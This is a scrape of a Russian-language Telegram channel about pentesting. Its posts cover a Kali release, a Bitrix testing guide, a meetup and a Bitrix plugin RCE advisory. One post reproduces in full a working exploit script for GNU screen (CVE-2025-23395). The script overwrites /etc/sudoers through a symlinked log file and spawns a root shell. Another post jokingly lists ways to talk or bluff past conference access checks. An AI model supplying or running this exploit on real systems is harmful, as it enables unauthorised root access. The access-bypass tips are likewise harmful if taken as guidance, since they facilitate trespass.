Pentest Notes
1.13K subscribers
141 photos
5 videos
5 files
75 links
https://www.pentestnotes.ru

Заметки про пентест, CTF и информационную безопасность

https://t.iss.one/github_exploits
Download Telegram
В официальном репозитории Kali Linux появилась версия 2025.1. Ждём официального релиза со списком изменений

https://cdimage.kali.org/kali-2025.1a/
🔥15👾4❤‍🔥3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Подготовил для вас самый большой на данный момент гайд по тестированию CMS Bitrix. 😈

➡️Причем, в статье я не только показал все существующие на данный момент известные методы и техники поиска уязвимостей в битриксе, но и поделился своими уникальными наработками. Включая атаки на кастомные модули и анонс собственного сканера под CMS Bitrix.

➡️Также добавил материалы по структуре модулей и матчасть по самому Битриксу. Даже если вы только знакомитесь с этой CMS, после прочтения точно что-нибудь найдете)🥤

Ссылка на статью

💫 @pentestnotes | #pentest #bitrix
Please open Telegram to view this post
VIEW IN TELEGRAM
36🔥26👍14
29 апреля в московском офисе Авито прошел Avito Security meetup.

В основном были темы про appsec, SOC, LLM, но помимо этого, ещё рассказали про интересный кейс взлома WiFi

Ссылка на запись

💫 @pentestnotes
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥165😱5🥰1🤯1
🚨Очередная критическая RCE уязвимость в модулях для CMS Bitrix стороннего разработчика Esolutions (BDU:2025-03006)

На этот раз уязвимость нашли в плагинах «Экспорт/Импорт товаров в Excel». Эксплуатация уязвимости позволяет выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса.

Данной RCE уязвимости потенциально подвержены более 6000 веб-ресурсов.

Критичность - 8,8/10 CVSS 3.0

Подробнее рассказал тут

#bitrix #rce

💫 @pentestnotes
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥21👍6🤯4
Уязвимость в GNU screen, позволяющая выполнить код с правами root (CVE-2025-23395)

Уязвимость вызвана тем, что при запуске с правами root функция logfile_reopen() выполняется до сброса привилегий, но обрабатывает данные в контексте каталогов текущего непривилегированного пользователя, запустившего screen. Примечательно, что начальное открытие лога производится с корректным сбросом привилегий, но при повторном открытии файла с логом сброс привилегий не производится.

Exploit:
#!/bin/sh
# screen CVE-2025-23395 exploit
# blablabla
# blasty <[email protected]>
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L


Источники:
- https://www.opennet.ru/opennews/art.shtml?num=63226
- https://haxx.in/files/limit-your-screentime.sh

💫 @pentestnotes
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥15👍7🤯3🗿1
Выделил несколько интересных, но неочевидных для обычного смертного (стандартный бейдж) мест, которые есть на Phdays

1. Спикер зона между 21 и 22 залами в Cyberhub (Говорят, что если очень уверенно сказать, что ты спикер, стафф на входе может в это поверить)
2. На втором этаже главной арены есть VIPка кибердома, там можно бесплатно залутать мерчик и попить коктелей
3. Если хотите попасть в зону Red team команд, то можете просто зайти в павильон с черного хода, показав эту штуку с озона за 100р. (У каждого хакера брендированный красный браслетик, но кто вообще будет смотреть действительно ли он брендированный).
4. На 3 этаже главной арены в нескольких местах спавнится еда. Говорят, что проверки на принадлежность участника к бизнесу такие же надёжные, как в прошлых пунктах. А еще, кстати, там не знают, что ноутбуки можно блокировать
5. Видел как кто-то спускался с крыши главной арены на тросах, выглядело прикольно

И, если вы вдруг захотели попробовать реализовать любой из пунктов этой подборки, лучше попробуйте пройти SEQuest – конкурс по социальной инженерии, который проводится в рамках фестиваля
2🔥13😈5🥰2😁1